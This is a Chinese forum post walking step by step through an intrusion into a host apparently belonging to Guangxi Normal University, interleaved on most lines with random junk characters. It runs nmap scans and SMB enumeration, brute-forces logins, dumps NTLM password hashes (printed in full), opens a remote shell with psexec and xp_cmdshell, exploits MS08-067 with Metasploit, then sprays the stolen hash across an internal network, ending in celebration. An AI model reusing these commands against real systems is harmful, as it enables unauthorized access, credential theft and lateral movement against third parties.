广西师范网站http://202.103.242.241// Z& }9 }# r- x# b
4 d7 g( I# i: t/ O& }
root@bt:~# nmap -sS -sV 202.103.242.241+ O2 Q# p1 f9 q( g
: X5 M, y4 G8 B T
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
' t$ E! p% d( l7 d7 X6 H1 [8 v+ @% j9 }3 U
Nmap scan report for bogon (202.103.242.241)
! M, m; n3 Z6 X
# {) f" v- J" J7 i, GHost is up (0.00048s latency).
: M3 q0 s: d) h( r5 q8 P, I- Y" p5 x# |9 O8 `# ^! R8 ]& B2 d
Not shown: 993 closed ports
% g- m8 `" h7 q# I3 B; I3 y# ~% ], X# _' X0 x
PORT STATE SERVICE VERSION
! C8 R; g& K7 c# f1 {& i1 R
: }0 j0 R: K: A+ `135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe), H2 ]7 Z& Y3 k
/ b) w6 e7 }; T( c2 f/ w/ Z q/ Y& e139/tcp open netbios-ssn q, i' m% r, z
1 f5 ~8 p$ W' `5 [
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
# Y% L% y+ U) k: u8 c7 i! ^# x( h: H! S3 p' G1 n d E- [
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
7 N% U5 g7 m. ?+ | ]. n: k$ n# v/ q' v, P, j$ S9 T! W( |
1026/tcp open msrpc Microsoft Windows RPC' H' B; {% C* ? [2 C4 I
8 h- y( Q: R: d( q P3372/tcp open msdtc?) b' o1 D* `! k/ K; d% S; u7 l
& F( N6 X6 c- m1 K
3389/tcp open ms-term-serv?
, J# q, h4 v# Q, F( @7 _" S: @6 @1 K/ l6 B' n" a
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
: z, Z: ]" h& u" ?0 X* V3 ASF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r/ M5 Y- W. t! d, {9 X
# _; @/ } ^; `. g5 a- k
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
$ w$ @2 x9 T3 K7 q
2 U, `3 E8 P* ?$ f5 }! z" YSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)+ K) c6 R2 G$ a4 d
! o) M" k5 \3 oSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO( M: Q4 `4 |( E
6 z( H& p! [6 j- Y- s, F
SF:ptions,6,”hO\n\x000Z”);
$ w4 r {8 ^ B
* H3 C+ S; H+ y+ vMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
4 H& F/ h* i+ Q! U" p7 b
6 n. ?; e$ z4 h7 U) Y! ]# Z7 ] qService Info: OS: Windows
8 b+ x% N4 q+ E2 {, Y1 l; M) u2 y: m6 w) g8 W3 }
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
0 P4 y' {6 D) |9 V0 ^8 g4 f* ?2 k; {9 \8 d0 X- W6 w8 L8 j' N
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds& l S4 U* a/ |+ u
% e6 f- n! V! F. r F
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本% C& r% K7 Y& I4 D
9 g( R u* W/ P4 b7 T. t! q% B+ ]-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
" O0 T8 Y8 Y( t" i4 M* m& ]
; |) e8 A: z0 O- Y7 t/ ?* N7 I-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse. }6 J! P+ U$ a4 D* U
5 n0 D( E2 p+ E* F-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse% z( K4 m; H2 n0 Y4 C0 p: C
- ^& d4 J; ?1 n9 A6 J/ x" Y" g-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse Q+ O# S; d- L) B9 _& R% X
! c4 k" N0 p+ c6 p4 K$ I5 K
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse3 t; K0 F4 V" }9 Z+ [" z
" X& }, M5 Y' j% q-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
4 r) y- N4 y% i7 P4 n0 W& k! [3 |- ]/ f( U5 R
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
0 W! h/ K7 `* f0 Q5 o; f2 ` {+ c7 p8 g2 |
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse' z4 K1 q" W4 P' H) b+ B8 j
" S! T+ r5 N3 Z
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
9 o2 m/ S( X I5 C* o' ~7 X/ h9 a- v% K! x; C1 T4 @& \' d
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse% u( D1 V# @& n, }
; W2 b# O2 s4 i- u6 b9 T-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
: g8 X5 t7 Y% i( `1 M8 G1 Z
! i' e* c0 a: D, V+ `1 k% n5 u-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
\! f$ h* c* R' H3 m7 y9 O- ]# Z* K5 K! x) x2 e1 S
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse( C- A0 o+ [8 t$ v' |
0 K" T) L: c7 v T: [+ B
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
& E6 I7 m; P3 u, W8 z& f. z. ]: ?& U5 W8 s7 q9 W) ?
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse0 b- C( L$ t5 Z5 Y' q
5 y G% m' @% v" X
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
5 p. R4 R9 i2 A/ ~; H4 C3 R
/ k* ^+ H% D5 `' G1 y2 N. H. \//此乃使用脚本扫描远程机器所存在的账户名$ {# j2 G, y$ X) E. u& l
! G. F; F! ?, k$ L$ DStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
; | v7 P3 K' J8 a8 e$ O8 D) `2 m( ~! F
Nmap scan report for bogon (202.103.242.241)
) [* X/ R5 o8 V" d( B$ c5 f% w* L. l' D) Z6 ~' t% a
Host is up (0.00038s latency).# s4 r: p6 g2 N, p7 ^1 m# A
/ F- r6 F# \! m9 p* tNot shown: 993 closed ports; o1 O5 u; O/ ]' n% ]
2 j; {% d$ e4 r: h4 |' ?6 A( ]
PORT STATE SERVICE
! R1 I, n1 |9 V' V i3 z$ x) W0 p. N2 c( l; }4 x
135/tcp open msrpc$ e0 I1 w$ P" U7 S; B
3 W8 s, s4 V8 i6 z! a139/tcp open netbios-ssn
, ]- @) V( i. W) i! g& T
2 I+ q1 [; t# t445/tcp open microsoft-ds
) J2 T+ P; _8 O- z- B$ ]% N4 x; E0 @1 a( o, o. h6 ~
1025/tcp open NFS-or-IIS
4 c0 ]- G1 t! y
" o3 \. s U: R* M0 L$ ?. ^( y3 m; M1026/tcp open LSA-or-nterm* q: P; c, P! O$ d3 U, H
. v/ P5 [, x. |# V2 m3372/tcp open msdtc
0 i+ D# ]* C2 |0 F
" J. u+ C6 @" G: v2 J3389/tcp open ms-term-serv
$ |- {+ y' b" x. q4 e# Y; T% J; R' _5 q/ K: L: Y6 a- d, V! A
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
+ k1 H$ D# K# i9 D4 N
9 `' g8 u7 K7 J) C# QHost script results:9 L j' U) z) c
9 i/ H- Z) ]: k0 X k, Z+ K
| smb-enum-users:
, A+ C. E' y0 v; S$ J0 h5 O( j! {% T$ S/ G$ C: o% b
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果1 p$ t9 p. y3 H0 I
6 n) u a& M6 H8 mNmap done: 1 IP address (1 host up) scanned in 1.09 seconds
5 x) G' i5 H: W" V* n
( S, g' f. H2 r: Proot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
5 [# D+ ^3 w# k) H2 m
- u* n* g- e) B/ V//查看共享
7 a$ ^* i) J$ l5 O) D
1 k. K5 D6 \! }0 S* zStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST. \/ k2 h/ m$ T' r0 M% [$ h
C5 e7 _& I- d- \% k% p' p# uNmap scan report for bogon (202.103.242.241)8 m3 n6 Y3 p8 P y4 X
8 a1 N0 B+ o* b5 [1 gHost is up (0.00035s latency).& V) q2 z' g& L* Z, }- Q3 ?3 w- ?
. Z- R; l' q$ U- n( k
Not shown: 993 closed ports& C) b( h! o; ]: J4 O
! `8 ~ N8 A+ b$ s' }; p/ W
PORT STATE SERVICE
. c( i W7 ^1 O0 k7 U+ m$ X- S2 w/ O6 u" `4 W, } `2 X
135/tcp open msrpc3 D8 W% N, I1 W! P+ ~0 @0 A f& P- P
! Y' w& ~# @8 v, d0 ]8 n139/tcp open netbios-ssn
: |& g) P H. U/ I7 Q4 B' d: \( Z' j& z' g1 ~7 f3 [
445/tcp open microsoft-ds
8 I( b( W: Z' l% S6 K- K# J
?( j8 ^# Q' M4 g& _1025/tcp open NFS-or-IIS
. i0 j2 }6 i3 A9 G* F) E. ?3 j8 J: v- _ }" j7 q& u) H9 I
1026/tcp open LSA-or-nterm
0 G2 @4 s* L/ K/ s9 U& p. V& {% m/ L6 P' B
3372/tcp open msdtc1 q8 G. ^$ s# F$ C/ L2 L4 S1 k/ r% V
3 s8 g" }& x( {; C# J& k6 d, m! \) I3389/tcp open ms-term-serv, I) v/ X( L& j5 D; d: @
7 [% ?$ o& x% v, d& [4 L
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
/ }5 Y7 y) g: {+ |
) N# d1 O$ R8 o. [, VHost script results:% ]/ ^& G* ], O B
_6 c2 M& v* R# g& H5 E# H) z
| smb-enum-shares:' J; V9 @4 c2 E, c& n
' r/ l# s/ X3 S+ Z2 E
| ADMIN$
* B/ q6 y3 U9 u$ P+ S( T) M# t: ]) P$ E. v5 B) s" {* P) J
| Anonymous access: <none>
' z# r! ]6 _/ q3 n3 o0 k, A* u% V5 }4 B! }! l
| C$+ @+ {4 i' t4 f3 @, [% G
4 b9 X. t7 \6 E6 y: b* E| Anonymous access: <none>
/ R* E8 v+ E. ~
# I. ~5 `8 P; f6 A @5 Z| IPC$, k( [6 A& e) a( O& }- ?
+ G5 [9 ~2 d- S, |
|_ Anonymous access: READ5 ~ s1 b) W0 w: n
0 }, h& R& j4 L- h; }" LNmap done: 1 IP address (1 host up) scanned in 1.05 seconds
- m4 ^/ N& N5 L0 J5 ?: K0 Y" f8 E1 \6 ?9 {, C" d1 L
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 6 ]0 a0 [& z( [8 [- D3 q: y
9 S% q. I4 Z: |$ t" ?4 v8 Y/ _
//获取用户密码* l* b' Q7 d# r' c9 K
! T0 ^# Z4 s. c6 D. @+ bStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST) M. x4 @" W! P/ [9 ^+ v
1 E7 }) }- ^9 A& d
Nmap scan report for bogon (202.103.242.2418)
5 u4 r8 ?: }# u$ A( k
- p% t9 t4 m( _ C6 M, U/ K: uHost is up (0.00041s latency).
y1 l5 m7 I5 l
# i, W6 U: b9 a! iNot shown: 993 closed ports+ Y% w4 Z a! |7 j3 g8 p2 N
3 f% Q1 s- w5 u+ @- }PORT STATE SERVICE
# N9 f0 \8 _* I
4 B5 h6 M! }+ \135/tcp open msrpc3 F0 O2 `) W# L& g
3 P3 {& |6 O- Q3 R5 m139/tcp open netbios-ssn
! O/ p* b8 o! p4 @/ W/ p7 m6 r) s
, X' ]' A7 Y' B' B" q& i, W445/tcp open microsoft-ds4 z. H. K5 H* q+ Z5 E# t( M
; Q6 N0 T" C9 i8 v4 r
1025/tcp open NFS-or-IIS1 D2 p F7 {+ g
; h0 z# v6 o8 K. y, |1026/tcp open LSA-or-nterm
( G/ F- X9 e( m; n7 o
% }1 |( V; `* ^$ p# T( b$ p3372/tcp open msdtc, {! B6 \- D( w
, K3 e' {4 T; @; H3389/tcp open ms-term-serv
& K1 x! Q. Z. }" z0 @2 M, x C5 o% W
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)' `9 _; \1 | j8 f9 n3 c
" F7 R9 y6 U% K' ?. \4 j1 I0 t0 n
Host script results:, d% t% ~- R: w- ^5 u
( X) ?4 e! m4 i4 N| smb-brute:
2 E6 r* d. {% R" W6 }( P" V% V5 Q+ j2 g v& J7 N
administrator:<blank> => Login was successful( m, |1 o& y# ?- X0 T& ^
9 v, D1 A2 t( Q! n" o
|_ test:123456 => Login was successful
- f- C7 y; a/ b9 }1 {8 |5 e. `' Q. H9 T4 ~& s) G
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
2 U3 h9 r Y1 c" q
. K" M: N- r0 W% f eroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
/ `) Z1 F, ?0 d" _- A7 z; F- p3 x* t$ s( Q6 m
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data* d( X: T! Q2 }$ {9 p
2 G3 ?3 e" Q0 s: H& r! D0 N" droot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse3 ~' L c2 s# }: u
& x& k1 i9 X5 o. b) C
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139( q2 z; ?) x7 P4 @+ B m
6 e" U) s+ s/ R$ S2 h% ]Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST( b0 g0 x9 `1 N; }" B
' p- k' f$ H8 j# ^( I3 x" WNmap scan report for bogon (202.103.242.241)- D+ L- h3 p6 a8 k7 [ K. m. G
/ e; T7 {- G3 L& E/ Y9 ~
Host is up (0.0012s latency).
. n3 q) _ u% \5 ~. D& S& k! j- j$ B
PORT STATE SERVICE$ e2 _- l- a2 K- a
% P; s+ C* Z, Q; O& W6 _135/tcp open msrpc0 w( R9 J8 c% u
, ^4 P }$ v. T! ]139/tcp open netbios-ssn3 T. @! |6 C6 r6 a. t' y, I
- C* Y- t V, Y5 P& p( D2 O445/tcp open microsoft-ds6 r( p0 j/ z S1 F, b* W
3 x# B+ P4 J, U6 }1 ]% aMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)$ T: x0 S+ Q6 G# F) w
$ K4 P3 e2 S( j8 d; M8 THost script results:% |1 c1 J, I8 i: k- X& ?
3 l- n% v- i7 K5 E- c| smb-pwdump:8 r) Z1 K9 Z! l' n( R' c
( g- f% U+ k7 ~" p9 e- I$ @| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************. y' j# Y- f* S D
) C1 |# U, F4 x2 t| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************/ f& R& d7 z9 n; e! L* q
3 @ p0 O; U6 s| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4. n' U! K9 M6 |, C
+ W C8 N& K( j% `- E, P|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
1 A) `- J. ?. ]" x. ^. b" y0 D2 L/ k4 e u9 L, k
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds+ R* h) {9 J# d7 o
* V# |+ h; B- B5 l& e3 r
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell+ n4 d2 `5 q0 v/ K& s' H2 B
# Q$ r. \& j! X' l' U, ^
-p 123456 -e cmd.exe
% y) R% Y4 r% O A' d. Z
3 m: p6 Q6 Q, }PsExec v1.55 – Execute processes remotely
; x3 D" }9 |7 Q/ X) `' U. }- g
6 @5 F/ V$ S9 ?8 YCopyright (C) 2001-2004 Mark Russinovich
' C' S3 l' {& _
. b1 r7 K- c. X! G2 t* t9 {Sysinternals – www.sysinternals.com6 o/ c! Q% S8 v: _) U/ |" G2 D- N
& g6 Y3 D( m {* Q( m DMicrosoft Windows 2000 [Version 5.00.2195]# \! B- D/ `' [. S, q9 U% m
& I: B$ n- h$ \! l5 d7 d(C) 版权所有 1985-2000 Microsoft Corp.6 \6 x+ G/ t: y& I. s
7 {% |' r: z) V' z) TC:\WINNT\system32>ipconfig" K% ~+ R# ^0 Q3 ?* e
- w# t' I* @1 }
Windows 2000 IP Configuration
* d- E x8 c. G4 {3 ?+ j, ~( Z2 d) H- I8 h0 Y1 `: T
Ethernet adapter 本地连接:
) l. _) B$ v, Z8 j, i( \- y& g+ g& f5 U l7 a) @7 x
Connection-specific DNS Suffix . :) O- d* u, E4 K1 D6 z: u
8 n8 Z1 [- U) q6 }4 _/ D% ~/ A# MIP Address. . . . . . . . . . . . : 202.103.242.241
% I' R: B+ E+ E7 ]! j2 o' |; S) i( i3 J( j: t" e
Subnet Mask . . . . . . . . . . . : 255.255.255.00 g/ ^6 a0 I& D+ q _% f8 g y( Q
7 p4 @- U6 w. S: T! l
Default Gateway . . . . . . . . . : 202.103.1.1
- g- G( k& x9 P* c3 f: U" |& A% [' j* N2 d% j& |2 I7 Y1 c
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
1 T5 a* |8 `" @; V4 L3 a/ p; M5 p: F
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞 l9 w+ {+ K' E& w2 u" s, D
$ H, Q/ v% E& w' @- S8 n5 X
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
2 q( p0 }7 ~+ Y4 ?0 j0 D
7 H/ M" |8 |" u. n6 X( ANmap scan report for bogon (202.103.242.241)- Z( O) M- B5 A) ~) w: X- P2 y
! o0 t F: E5 A' |7 ~3 JHost is up (0.00046s latency).: x' F- s- W3 D; u
! S+ ?, w6 O4 |$ t
Not shown: 993 closed ports& x1 `" e5 H; J- d" M6 b) } a1 ]5 b
( J9 p6 p* c6 ~1 r& c! ]PORT STATE SERVICE
& S6 n% u. l/ l% H6 ]/ i7 I/ f: O, ?9 e
135/tcp open msrpc
5 [! d- K1 z) f1 a3 n$ m/ g8 T& r9 o2 O1 z; L* Y5 ]0 l& j; c8 ^
139/tcp open netbios-ssn
" Q& U. s) h9 \) `1 n6 R# v& i9 |# I3 l4 F
445/tcp open microsoft-ds; O3 X$ V$ Q& \
* ^8 _+ c7 |- s1025/tcp open NFS-or-IIS
* \6 ]. F9 E1 R! g5 j7 D" `" Q" A8 l. G5 C# R# ^: F
1026/tcp open LSA-or-nterm5 X; Y$ ?% X0 x) c% O" E& t
6 p [, N' v7 \
3372/tcp open msdtc
6 |* |3 U- X: j1 _: L r6 h% U" E' `1 M" q+ U: [
3389/tcp open ms-term-serv7 j( v: }9 B: E5 D* }% B0 H( ]/ z
% P9 `1 S$ v) j; T. O4 B
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)& T7 z# z' q$ S
3 Z, e5 J* [1 X; R5 X+ q, |0 H" {Host script results:/ Y- |# p8 N2 H' E
' L# x# Y% o }: T8 U| smb-check-vulns: ?4 _& \/ M G* h- V
1 n& Z( x6 M/ ^4 I
|_ MS08-067: VULNERABLE
4 A2 Z6 ^6 K9 r& | N' ~) C- Z2 }" R$ d3 p. m
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds! j9 } R4 M6 F0 M- B, q" n
( S% [' B. {9 ^: ^1 g( ^; O0 c |root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出/ a5 o/ _# ]. O1 I: O
% ^# J+ o0 @) l7 \$ x# ^# cmsf > search ms08
. E r. v9 S! F4 o+ U- |6 x$ z, C
3 M3 a# j8 P- a8 zmsf > use exploit/windows/smb/ms08_067_netapi. D# r, E6 w8 V; V
- L# j' R$ h# H t: A7 U ~# z
msf exploit(ms08_067_netapi) > show options
' c- C+ s! d% R0 S
; u" g5 {- Z6 `msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
1 m8 }) R: n" ^1 T
- Z( Q Q8 s* t$ H. Gmsf exploit(ms08_067_netapi) > show payloads+ J; ]2 m+ @2 Q0 m2 @
' h9 L) [0 r5 A Wmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp0 t. H' k( ? ]( |
; f1 F2 U9 _ m/ F* S. p2 o$ h' m. @msf exploit(ms08_067_netapi) > exploit# [9 ^9 _1 S. | o4 P( C
( O! `. P% Y# h8 e: i8 T* Z
meterpreter >- d8 l/ r: r1 V
" W3 u$ @$ |! Y& o3 q
Background session 2? [y/N] (ctrl+z), u! d1 ?6 g) n: a3 ~$ t
" p0 Q, S/ U b' @' ~, m$ z
msf exploit(ms08_067_netapi) > sessions -l+ O V" ~& g N) h! h8 [/ A9 p
0 i9 B" t! y( a, J9 s1 Sroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt
/ p' X2 h0 P3 I+ N5 L
' I* Z8 c2 u/ `0 s3 Q( Ntest
2 M& T- S+ P& ]: Y- R
( ]; S' J- L) ?* Q7 h. Jadministrator
x9 m1 @7 b4 }7 X; N7 p0 [2 m8 }" i N6 c
root@bt:/usr/local/share/nmap/scripts# vim password.txt9 a3 p# D- ?( o/ d: E
( g" t* P2 m( }44EFCE164AB921CAAAD3B435B51404EE8 F* g7 F4 v5 Z0 M4 v( ~5 P
/ d) p3 S7 i2 [0 B4 }root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
$ l& k* A. f W/ l' S1 K3 P& ~3 m8 j% H* I
//利用用户名跟获取的hash尝试对整段内网进行登录9 @6 f4 y& z* A
4 z: g4 z% w- k/ a( o% n: yNmap scan report for 192.168.1.105' n( N* M% [3 ~2 j& {, z
8 e2 T' k7 U9 p5 U uHost is up (0.00088s latency).
2 r/ e8 j0 L& U& I2 {2 q6 r. R
: B* A! s2 s5 \ q" FNot shown: 993 closed ports
/ z$ O& Z3 n; {* A8 |: W' P& t) d1 Z) a. u% j. \1 L- K2 p2 k; V' j
PORT STATE SERVICE
+ W" K% Y4 d! |& @; _3 s; y. s9 v m' R* Z4 w
135/tcp open msrpc% h* Z2 e* @1 `/ u) v% x5 b
0 a: Q- K& h: W+ D1 m139/tcp open netbios-ssn" P1 f1 }: E! H2 K n% L% R
' k% C" e. u; E- _6 m) Q3 Z' t445/tcp open microsoft-ds0 V( Y8 w6 D# F" W
p# D8 r5 Y- \. Y9 G% X& q1025/tcp open NFS-or-IIS
" L$ Q) x8 _ b4 `! ^+ r! K# j/ s5 F: M/ S( R
1026/tcp open LSA-or-nterm
# c. D8 T$ }, p) z
7 u5 O5 F- W$ I2 r3372/tcp open msdtc" q3 C* O+ \, \
0 O- K4 t3 f$ y3 g7 E. v4 ^3389/tcp open ms-term-serv L5 q# v& V2 @' g+ J2 ~' f" V
' p' @" K3 ^) N- P5 l' X4 {MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
' M5 T4 q1 L. J% f; J( `: w
8 ^* e+ K$ P g( t- Q& i tHost script results:
+ A2 m. n( j, }# x" {( ]8 R' ^2 |/ @1 e6 z
| smb-brute:
e0 o3 m9 w+ g5 U9 y
1 W! Z5 ^& t- o( v$ d @|_ administrator:<blank> => Login was successful4 ^, j$ J# x2 ]& a8 k/ i9 G- `" A
4 @7 E& w) k' a攻击成功,一个简单的msf+nmap攻击~~·% i% h1 h' j. V% b5 u; ^
" P5 f* b/ p; ?4 a% t7 n" N; P |
发表于 2012-12-4 12:46:42
收藏
分享
支持
反对